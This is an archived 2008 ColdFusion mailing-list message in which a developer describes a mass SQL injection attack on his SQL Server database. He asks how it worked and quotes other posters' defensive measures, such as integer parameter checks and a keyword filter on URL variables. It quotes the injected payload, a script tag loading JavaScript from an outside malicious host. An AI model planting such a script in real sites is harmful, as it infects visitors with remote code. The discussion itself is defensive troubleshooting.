Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! > -----Original Message----- > From: Bruce Schuman [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 07, 2008 12:17 > To: CF-Talk > Subject: RE: HELP! SQL Injection Attack! > > > The attack appends JavaScript to character fields. > > > Hi. Just checking in here on SQL injection -- I am a > self-taught self-employed CF programmer, been doing this for > quite a while, but there is a ton I don't know. And I have > been hit by this current wave of injection > > So, my SQL Server 2005 database doesn't just get one record > injected. It's every record in a particular field, all > containing (in this attack) this code > > script src="http://jjmaoduo.3322.org/csrss/w.js"; > > and a few more things in html I didn't include > > > > What I have done to protect about 15 CF sites -- is simply > require that integer values be integers -- by cfincluding a > list of params like this, from application.cfm: > > ><CFIF IsDefined("groupid")> > ><CFPARAM NAME="groupid" TYPE="integer"> </CFIF> <CFIF > >IsDefined("login")> <CFPARAM NAME="login" TYPE="integer"> > </CFIF> <CFIF > >IsDefined("sg")> <CFPARAM NAME="sg" TYPE="integer"> </CFIF> <CFIF > >IsDefined("messageid")> <CFPARAM NAME="messageid" TYPE="integer"> > ></CFIF> <CFIF IsDefined("msg")> <CFPARAM NAME="msg" TYPE="integer"> > ></CFIF> > > > So, this text script has been injected into every record in > about five fields in my users table -- and also into a > variety of other tables in the same way: every record in that > table, in some selected fields. > > All these injected fields are text fields -- URLs, addresses, > > Can this be done through a URL? > > Does the list of fields that have been injected provide any > clue about how or where the injection attack occurred? How > do these guys, or their program, know my table names and my > field names? I have some very obscure field names, and they > still get them injected - they are not guessing these things, > they know the name of the field. > > If I wanted to duplicate what they did, I would write a loop > that would go through every record in the table, and CFUPDATE > that particular record. In fact, I wrote scripts like this > to remove this junk, setting the record back to what it was > before the injection. How do they do this? > > > > Anyway, got my hands full. Any thoughts on this would be great. > > And yes, I'd like to see the URL "loop" script that was > offered by Justin Scott > > >Actually, with this particular SQL injection attack it's > really easy to > >stop. We created a SQL filter that is called from > application.cfm. It > >loops through the URL structure and checks to see if any URL > variables > >contain both a semi-colon and any SQL keyword. If a match > is found, it > >just cfaborts the request and sends us an e-mail with the > details. We > >periodically review those messages and have not found a single > >false-positive yet after deployment to every site we manage. > Granted, > >it will not stop SQL injection through form posts, but I > don't recall > >ever seeing a SQL injection attack through a form post > (yet). At the > >least it can put an immediate stop to the current flood and give you > >time to implement other protective measures such as > cfqueryparam, etc. > >We have CF5 and CFMX versions if anyone wants a copy. > > Bruce Schuman > Santa Barbara CA > http://originresearch.com > > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310408 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
